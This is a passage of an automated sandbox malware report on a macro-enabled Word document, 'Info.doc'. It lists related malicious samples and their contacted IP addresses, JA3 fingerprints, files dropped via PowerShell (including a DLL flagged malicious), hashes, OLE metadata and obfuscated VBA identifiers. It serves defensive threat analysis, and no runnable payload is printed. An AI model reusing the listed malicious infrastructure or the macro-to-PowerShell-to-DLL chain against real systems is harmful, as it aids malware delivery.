                                          INFO-22.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          Documento_9276701.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          Dati_2112_122020.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          Informacion 122020 N-98239.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          as233456.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          Y0124.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          nIUMFDogK0.exeGet hashmaliciousBrowse
                                          • 202.187.199.171
                                          Transfer invoice.vbsGet hashmaliciousBrowse
                                          • 61.6.84.83
                                          REMITTANCE SLI.exeGet hashmaliciousBrowse
                                          • 61.6.13.149
                                          a2.ex.exeGet hashmaliciousBrowse
                                          • 202.184.167.189
                                          meront.exeGet hashmaliciousBrowse
                                          • 61.6.30.223
                                          31PAYMENT ADVIC.exeGet hashmaliciousBrowse
                                          • 61.6.43.245
                                          Wollin_Info.docGet hashmaliciousBrowse
                                          • 202.190.140.230

                                          JA3 Fingerprints

                                          Match: 05af1f5ca1b87cc9cc9b25185115607d
                                          Associated Sample Name / URL    Detection    Context
                                          documents.doc    malicious    45.119.81.203
                                          spetsifikatsiya.xls    malicious    45.119.81.203
                                          Shipping Document PL and BL003534.ppt    malicious    45.119.81.203
                                          Payment Documents.xls    malicious    45.119.81.203
                                          Shipping Document PLBL003534.xls    malicious    45.119.81.203
                                          ST_Heodo_ST_2021-01-05_19-42-11-017.eml_20210105Rechnung.doc_analyze.doc    malicious    45.119.81.203
                                          6Cprm97UTl.xls    malicious    45.119.81.203
                                          DAT 2020_12_30.doc    malicious    45.119.81.203
                                          N.11389944 BS 05 gen 2021.doc    malicious    45.119.81.203
                                          PSX7103491.doc    malicious    45.119.81.203
                                          Beauftragung.doc    malicious    45.119.81.203
                                          1I72L29IL3F.doc    malicious    45.119.81.203
                                          Adjunto_2021.doc    malicious    45.119.81.203
                                          #U00e0#U00a4#U00ac#U00e0#U00a5#U20ac#U00e0#U00a4#U0153#U00e0#U00a4#U2022.doc    malicious    45.119.81.203
                                          Dok 0501 012021 Q_93291.doc    malicious    45.119.81.203
                                          invoice.doc    malicious    45.119.81.203
                                          spetsifikatsiya.xls    malicious    45.119.81.203
                                          1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls    malicious    45.119.81.203
                                          output.xls    malicious    45.119.81.203
                                          output.xls    malicious    45.119.81.203

                                          Dropped Files

                                          Match: C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll
                                          Associated Sample Name / URL    Detection
                                          List 2020_12_21 OZV3903.doc    malicious

                                            Created / dropped Files

                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                            Category:dropped
                                            Size (bytes):58936
                                            Entropy (8bit):7.994797855729196
                                            Encrypted:true
                                            SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                            MD5:E4F1E21910443409E81E5B55DC8DE774
                                            SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                            SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                            SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                            Malicious:false
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):893
                                            Entropy (8bit):7.366016576663508
                                            Encrypted:false
                                            SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                            MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                            SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                            SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                            SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                            Malicious:false
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):326
                                            Entropy (8bit):3.1147363886328936
                                            Encrypted:false
                                            SSDEEP:6:kKDawwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:pkPlE99SNxAhUegeT2
                                            MD5:42BAB33729D6AFE2F6C7CF259B74AA3D
                                            SHA1:91C38D646A7E82B67B0DEE11282D8AC68B2478BF
                                            SHA-256:485E0D5F033DAC298FB0788CD57B50E361F7CF64C30B2C5AE836BE7D77E08053
                                            SHA-512:0C295819321E7CDCF813D77C317838FBEA67CA270EBF2F354F5FB4821E7275966E865E1E9D9CBD7EBB87D3EADD43DFD7CF499708C84636F28F510B16DE446D06
                                            Malicious:false
                                            Preview: p...... ..........".>...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):252
                                            Entropy (8bit):3.0294634724686764
                                            Encrypted:false
                                            SSDEEP:3:kkFklLe6E/ltfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFc:kKt6aliBAIdQZV7eAYLit
                                            MD5:FA67AEBE43D711A5CE78354ABE605E72
                                            SHA1:208F8A4FAF7E7132FF937138193D4FDDEEE0AFA9
                                            SHA-256:4709951E558138636C6973555BAB83F608889996ABB890E54641B8FE9D2AA2D4
                                            SHA-512:83178B64130925BDCEF5110C30AF035B739A832DD12B45EAAD129FBB3825C1B70390087B8ED63E0DDC7178332520CE48EA131C77BC1B86D785E9F8B8832A8FBA
                                            Malicious:false
                                            Preview: p...... ....`...v...>...(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB48CD7-B28F-4AE5-86AD-026C320EA73C}.tmp
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1024
                                            Entropy (8bit):0.05390218305374581
                                            Encrypted:false
                                            SSDEEP:3:ol3lYdn:4Wn
                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                            Malicious:false
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{DB1AF416-0379-4C94-9D0C-259786EC4018}.tmp
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1536
                                            Entropy (8bit):1.3586208805849456
                                            Encrypted:false
                                            SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbE:IiiiiiiiiifdLloZQc8++lsJe1MzAOn
                                            MD5:85CDE8B53BF93B58839867D96F089CFA
                                            SHA1:71679E74429FED8858DF4C8A504C1AC3CCE748B6
                                            SHA-256:065E9099A8B8CB87EC1626C9B2D84C7DDC39DC9D766E0129B70AF2DC26BE9287
                                            SHA-512:88E0616BBEEAD18941B1C8200E74A29B29DE51F34E48DED0ABE7812984D6542C0D6E93EC41E8CAF4F7FE6F7BE0C0066C93FF64CDFC0DA08FBDD078F7CEFC2B84
                                            Malicious:false
                                            C:\Users\user\AppData\Local\Temp\Cab9D3A.tmp
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                            Category:dropped
                                            Size (bytes):58936
                                            Entropy (8bit):7.994797855729196
                                            Encrypted:true
                                            SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                            MD5:E4F1E21910443409E81E5B55DC8DE774
                                            SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                            SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                            SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                            Malicious:false
                                            C:\Users\user\AppData\Local\Temp\Tar9D3B.tmp
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):152533
                                            Entropy (8bit):6.31602258454967
                                            Encrypted:false
                                            SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                            MD5:D0682A3C344DFC62FB18D5A539F81F61
                                            SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                            SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                            SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                            Malicious:false
                                            C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162688
                                            Entropy (8bit):4.254472445116942
                                            Encrypted:false
                                            SSDEEP:1536:C6n3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CyVNSc83tKBAvQVCgOtmXmLpLm4l
                                            MD5:EE5BE5DA5880BCDBFAABB325C80F4F91
                                            SHA1:04C2A42E0F7E0AA34DB5F6E70BDD715BA98F4F38
                                            SHA-256:1B29C1A61465573EFC5E24AF2F34D18F14B10FDC87F46151CD5A0BF9C755DEC7
                                            SHA-512:034310B9AFEBB169D94D05A7AD98F73D9641E27C123E5EBF57A01290327F84C0FB887D16216AA1CB776CA0C5DF776FAE4A1926A14E75F1A692867A789E49E43D
                                            Malicious:false
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Info.LNK
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Thu Jan 7 20:42:32 2021, length=205824, window=hide
                                            Category:dropped
                                            Size (bytes):1960
                                            Entropy (8bit):4.5252080480118
                                            Encrypted:false
                                            SSDEEP:24:89m/XTwz6IknideS3wDv3qc4dM7dD29m/XTwz6IknideS3wDv3qc4dM7dV:89m/XT3IkKpvfQh29m/XT3IkKpvfQ/
                                            MD5:DE73479E0111158CBF54444A316E44D7
                                            SHA1:349D76E8714E489A3025B792223306A6ED6289B4
                                            SHA-256:DA645708EE9EC397FD481F94A9441A29C3114323C7568EE6EDD70096CEB376F0
                                            SHA-512:E3AC80BAEF20AB3C93D27F8AAEEB2607794BD3E609503FF8AA22AE42901F320F05F208151F48C17A118D389E65223D62CDC3D39FED0F25B508932A1EDA645751
                                            Malicious:false
                                            Preview: L..................F.... ...(....{..(....{..2.[.>....$...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....V.2..$..'RQ. .Info.doc..>.......Q.y.Q.y*...8.....................I.n.f.o...d.o.c.......r...............-...8...[............?J......C:\Users\..#...................\\585948\Users.user\Desktop\Info.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.n.f.o...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......585948..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L..................F
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):50
                                            Entropy (8bit):3.93139801091909
                                            Encrypted:false
                                            SSDEEP:3:M1gl0LDKAlmX1glv:Me8WAV1
                                            MD5:819E7F1E8DEC6A17E9FE80A7F0CDAC81
                                            SHA1:62256F51A722B9476BC00C0DECA00C11F4BDD603
                                            SHA-256:4C7BF443AF5E23507D0A82B450F3428CDC2D42E2D6A0267FEE158ED77BB3CC3C
                                            SHA-512:500D736EE0FE18FEF828F0B2FC78FAF28FE34F95B4E1C3D08CD39A482C0381D767216AC8FF4844EFC48C1C5EF3CA848F790193B4D87BE54DFC4CFC6BF8A1DEB2
                                            Malicious:false
                                            Preview: [doc]..Info.LNK=0..Info.LNK=0..[doc]..Info.LNK=0..
                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.431160061181642
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                            MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                            SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                            SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                            SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                            Malicious:false
                                            Preview:
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KYWZL3X0W8OQ8ETTUVJQ.temp
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8016
                                            Entropy (8bit):3.5889732684522677
                                            Encrypted:false
                                            SSDEEP:96:chQCsMqftMqvsqvJCwoBz8hQCsMqftMqvsEHyqvJCwor/zkCYftJHyf8RAt+lUVp:cy3oBz8y7Hnor/zkcf8RGIu
                                            MD5:1F5286C6B9A1444692440810FD19B2C9
                                            SHA1:4B7CA2CE20A7A8AD67823656B8DF6FEC7EE90573
                                            SHA-256:852C0A1E1BD428383519D614FE220140CE7A9B2A6F746B5AD6D8200B6D3521D5
                                            SHA-512:FA46091F99D7DA89EAE989C96603E0E394381D2139590145B96DCC420CBA199107C85FF0A737949FDAE627CF021DBAC4F2C6CAD1B8FF27A2712A2E945C6D5287
                                            Malicious:false
                                            Preview:
                                            C:\Users\user\Desktop\~$Info.doc
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.431160061181642
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                            MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                            SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                            SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                            SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                            Malicious:true
                                            Preview:
                                            C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:modified
                                            Size (bytes):239104
                                            Entropy (8bit):7.444820981958587
                                            Encrypted:false
                                            SSDEEP:3072:KC1sUJsEIo9CTFM5/A8eWLdlU8thEnYsqibnjPw+a5DIYvK8UIDoQQh3:KC1NJMo9ywAkdrHEn1qibjm5DIYSX
                                            MD5:A70E2124BF6F6A1CF51F69890A88AFF7
                                            SHA1:3652F6EEAA620CB1627A255D25A83A7365AEB3CF
                                            SHA-256:2ED12B3974BE2D729CB7EFDDDFCED6B61E5B00A56EBE27A6CF3FBB080880F2F0
                                            SHA-512:34EF461231752E5E907BF1DB82BA3E6B8CC6AEA6406756DD60D856ECB9EEA47F89D249A5AAEF7AFFF1E4556282F8EBDBA39C9C496D579451585C688C51169FB2
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 93%
                                            Joe Sandbox View:
                                            • Filename: List 2020_12_21 OZV3903.doc, Detection: malicious, Browse
                                            Preview:

                                            Static File Info

                                            General

                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Granite Kids & Beauty Director portals interface well-modulated white Web robust Wyoming Lodge database action-items, Author: Matto Carpentier, Template: Normal.dotm, Last Saved By: Maxime Marchal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 21 12:42:00 2020, Last Saved Time/Date: Mon Dec 21 12:43:00 2020, Number of Pages: 1, Number of Words: 5817, Number of Characters: 33163, Security: 8
                                            Entropy (8bit):6.401011099571846
                                            TrID:
                                            • Microsoft Word document (32009/1) 54.23%
                                            • Microsoft Word document (old ver.) (19008/1) 32.20%
                                            • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                            File name:Info.doc
                                            File size:205804
                                            MD5:37f5e7c688b8b8f664a9c8430f994f9f
                                            SHA1:98bd3f717551017517c306bd6d429f5d410a5dcd
                                            SHA256:ab0d8e587ebfbed00f0e6aaf7d82e4d60cb3140c983820f25192303cce71828d
                                            SHA512:f6b9e9d3ab7d96011d717e8783d0f1104dc929908bfe11ae405df6dcaa591afbb11917b3d9915efcfca0c662c468104ecdc2626bf9914f7791668c6339dfcb2b
                                            SSDEEP:3072:fm9ufstRUUKSns8T00JSHUgteMJ8qMD7gJ/LLr3DWaUsWB/1i1W5:fm9ufsfgIf0pLNLr3DWaUsWB/1i1W5
                                            File Content Preview:

                                            File Icon

                                            Icon Hash:e4eea2aaa4b4b4a4

                                            Static OLE Info

                                            General

                                            Document Type:OLE
                                            Number of OLE Files:1

                                            OLE File "Info.doc"

                                            Indicators

                                            Has Summary Info:True
                                            Application Name:Microsoft Office Word
                                            Encrypted Document:False
                                            Contains Word Document Stream:True
                                            Contains Workbook/Book Stream:False
                                            Contains PowerPoint Document Stream:False
                                            Contains Visio Document Stream:False
                                            Contains ObjectPool Stream:
                                            Flash Objects Count:
                                            Contains VBA Macros:True

                                            Summary

                                            Code Page:1252
                                            Title:
                                            Subject:Granite Kids & Beauty Director portals interface well-modulated white Web robust Wyoming Lodge database action-items
                                            Author:Matto Carpentier
                                            Keywords:
                                            Comments:
                                            Template:Normal.dotm
                                            Last Saved By:Maxime Marchal
                                            Revision Number:1
                                            Total Edit Time:0
                                            Create Time:2020-12-21 12:42:00
                                            Last Saved Time:2020-12-21 12:43:00
                                            Number of Pages:1
                                            Number of Words:5817
                                            Number of Characters:33163
                                            Creating Application:Microsoft Office Word
                                            Security:8

                                            Document Summary

                                            Document Code Page:1252
                                            Number of Lines:276
                                            Number of Paragraphs:77
                                            Thumbnail Scaling Desired:False
                                            Company:
                                            Contains Dirty Links:False
                                            Shared Document:False
                                            Changed Hyperlinks:False
                                            Application Version:983040

                                            Streams with VBA

                                            VBA File Name: UserForm1, Stream Size: -1
                                            General
                                            Stream Path:Macros/UserForm1
                                            VBA File Name:UserForm1
                                            Stream Size:-1
                                            Data ASCII:
                                            Data Raw:

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code
                                            VBA File Name: UserForm2, Stream Size: -1
                                            General
                                            Stream Path:Macros/UserForm2
                                            VBA File Name:UserForm2
                                            Stream Size:-1
                                            Data ASCII:
                                            Data Raw:

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code
                                            VBA File Name: UserForm3, Stream Size: -1
                                            General
                                            Stream Path:Macros/UserForm3
                                            VBA File Name:UserForm3
                                            Stream Size:-1
                                            Data ASCII:
                                            Data Raw:

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VB_GlobalNameSpace
                                            VBA Code
                                            VBA File Name: UserForm4, Stream Size: -1
                                            General
                                            Stream Path:Macros/UserForm4
                                            VBA File Name:UserForm4
                                            Stream Size:-1
                                            Data ASCII:
                                            Data Raw:

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VB_PredeclaredId
                                            VBA Code
                                            VBA File Name: UserForm5, Stream Size: -1
                                            General
                                            Stream Path:Macros/UserForm5
                                            VBA File Name:UserForm5
                                            Stream Size:-1
                                            Data ASCII:
                                            Data Raw:

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code
                                            VBA File Name: E2ajbo3kwzka_d5z, Stream Size: 16774
                                            General
                                            Stream Path:Macros/VBA/E2ajbo3kwzka_d5z
                                            VBA File Name:E2ajbo3kwzka_d5z
                                            Stream Size:16774
                                            Data ASCII:
                                            Data Raw:

                                            VBA Code Keywords

                                            Keyword
                                            "VmRVq.KguiplAD.CnKiJF"
                                            "mzbFCI.GqJWEXfB.IvEKh"
                                            ucksgAUED:
                                            VBA.Replace
                                            uCVFE:
                                            "PmlaEBCKi.aDNDiMEJF.HRUaFG"
                                            iZUiFEo
                                            "CSCUFAFCH.oVuLMa.FDGwJI"
                                            "VfIgjBIoD.XIcEF.mFxsSHhAy"
                                            MESgwEGs
                                            MTyfRH:
                                            "hAvFE.gNtOmJDDT.siHEJeBA"
                                            NwMaf
                                            hETyJRC
                                            IKCKmEI
                                            RUUlSIJ:
                                            VkyUFvAQ
                                            rdrMCIAI:
                                            zaqJLXHQB
                                            "jOtlAwLFD.EPAwGZvBC.pUffcye"
                                            "lnPdDhJC.bMciHAJ.kIbmrrwDE"
                                            vSlzf
                                            HceDHSBT:
                                            qYwhDUHUF
                                            EuQQU
                                            "xLbyBD.pNkya.qglyExEmD"
                                            cJGuSk
                                            yalsFI
                                            Binary
                                            dPGglCDI:
                                            bouyw
                                            lvBsE
                                            leAgdGL
                                            RUUlSIJ
                                            DmMFDGCIF
                                            fmpgIxE:
                                            uLayA
                                            HYgzEeH
                                            "NpfgFB.swoqfAC.AFkyDu"
                                            "QwOYIGHEH.SsghfXE.YpOECuE"
                                            WJlmFA:
                                            VoNcJE:
                                            DUkLHBE:
                                            wCHUJBF
                                            dxDqp:
                                            "pSUNGJ.rEyzmGIR.fKJzEGHlF"
                                            myZqF
                                            dAShIZ:
                                            "JoHvcaI.biuHE.OZMIY"
                                            abhpAG
                                            HceDHSBT
                                            "BkHxEBSFC.tMDBCAjtA.myOVCD"
                                            PlqIc
                                            trDhHH
                                            DUkLHBE
                                            VKdzoIA
                                            UJcNvrEMZ
                                            lflcCFHEH
                                            FxjMHFEG
                                            "tMWRDBD.PyMcSJCX.kuvBCEHCD"
                                            RXeMIz:
                                            Resume
                                            dxDqp
                                            "FjaGBJD.lxqCCEgBC.CThwUDHH"
                                            QDtIAa:
                                            "NjzoeAJI.ztQWICBD.UTsHBG"
                                            VhXlcAJ:
                                            jAJhFSDd
                                            "YGKua.nyqsJIB.FjjfGW"
                                            fOvrJBC
                                            RXeMIz
                                            "mYzOEQ.wEPPAQ.OlfMCJcBC"
                                            fmfXCB
                                            "mSEwGDrGG.JckHGA.TsUQZBs"
                                            "gytle.JmmNxgNA.gdskNAE"
                                            "syQPwEAB.eviMHXYJl.cygawhk"
                                            "LFrSmGw.TUJWGBq.NKVOUHDA"
                                            "FvUEEEB.bLVmn.UfOUHBQAV"
                                            jkpHCa
                                            MXUnJ:
                                            RMTXE
                                            AWPVuW:
                                            VKdzoIA:
                                            xcBKDBDWs
                                            wrBfaHFGi
                                            wBoOSH
                                            "eaoMpHk.BWPawm.joOPFH"
                                            zYNBD
                                            ChrW(wdKeyS)
                                            "LRnCyHk.hKQdhFCE.PBZNCEB"
                                            NYwMEt:
                                            leAgdGL:
                                            AWObErp
                                            bouyw:
                                            oQmyHt
                                            "sDMKJ.xLJHFBHe.PFsFiCCU"
                                            XprAmJ
                                            "OLJmEGA.vvoDIDIHc.xmHyGaeH"
                                            PhyKAJCf:
                                            dPGglCDI
                                            fEgLs
                                            yalsFI:
                                            CCsSFE:
                                            VB_Name
                                            xDafahA
                                            qAGhBZGOD
                                            VoNcJE
                                            pVusMEAHH
                                            ucksgAUED
                                            "zCvHB.Rakno.kCsoG"
                                            IBUfCf
                                            jkpHCa:
                                            jAJhFSDd:
                                            enARs:
                                            qAGhBZGOD:
                                            OjIBIirQH:
                                            kdcmxDAC:
                                            Error
                                            MXUnJ
                                            AWObErp:
                                            qWvjf
                                            vgRkI
                                            uCVFE
                                            xcBKDBDWs:
                                            iRmjYCJ:
                                            ioBaJ
                                            "crGHzAx.HRIOAE.kssuvIO"
                                            myZqF:
                                            mewiyE
                                            lOUng:
                                            VhXlcAJ
                                            hyoLCIB
                                            eSNRABD
                                            MESgwEGs:
                                            iRmjYCJ
                                            zkHRAHIHB
                                            lOUng
                                            EqMlCIDJE:
                                            eEBhP
                                            dAShIZ
                                            "WjGFr.CrdbdTP.KiDXJmC"
                                            fmpgIxE
                                            EqMlCIDJE
                                            WJlmFA
                                            enARs
                                            tzSIVA
                                            bMnEJ
                                            AWPVuW
                                            aPdrkaA
                                            xDafahA:
                                            "lHJfDH.npGBJms.SplDCEi"
                                            zkHRAHIHB:
                                            ONaTAGBtA
                                            OjIBIirQH
                                            MqlOHPQt
                                            rdrMCIAI
                                            "MYRHGEaI.QUycBC.dasNEIHT"
                                            Function
                                            vgRkI:
                                            LRONHDFBS
                                            BBsKIJkGJ:
                                            "ndnHDEJE.UiIxEHJJJ.qWURLCtF"
                                            fOvrJBC:
                                            PhyKAJCf
                                            "ZIEUAI.TJwaDyO.bsYzwJD"
                                            NYwMEt
                                            criwDE
                                            nwGAclAy
                                            "ccnvJJzA.VjfdtwDF.pUMgodC"
                                            VczvEJEA:
                                            QDtIAa
                                            CCsSFE
                                            fmfXCB:
                                            DJLVngj
                                            KxdEVTl
                                            "OyaElDCE.UpHzEp.iyQRbJCJU"
                                            "IIggVF.dxYJC.nWtxqJXiN"
                                            YxrfC:
                                            MRhwSdA
                                            lTjwD
                                            JyRZCQ
                                            BBsKIJkGJ
                                            AyCGHCJA
                                            "QKcQFx.oVrwjBAD.ZlujE"
                                            String
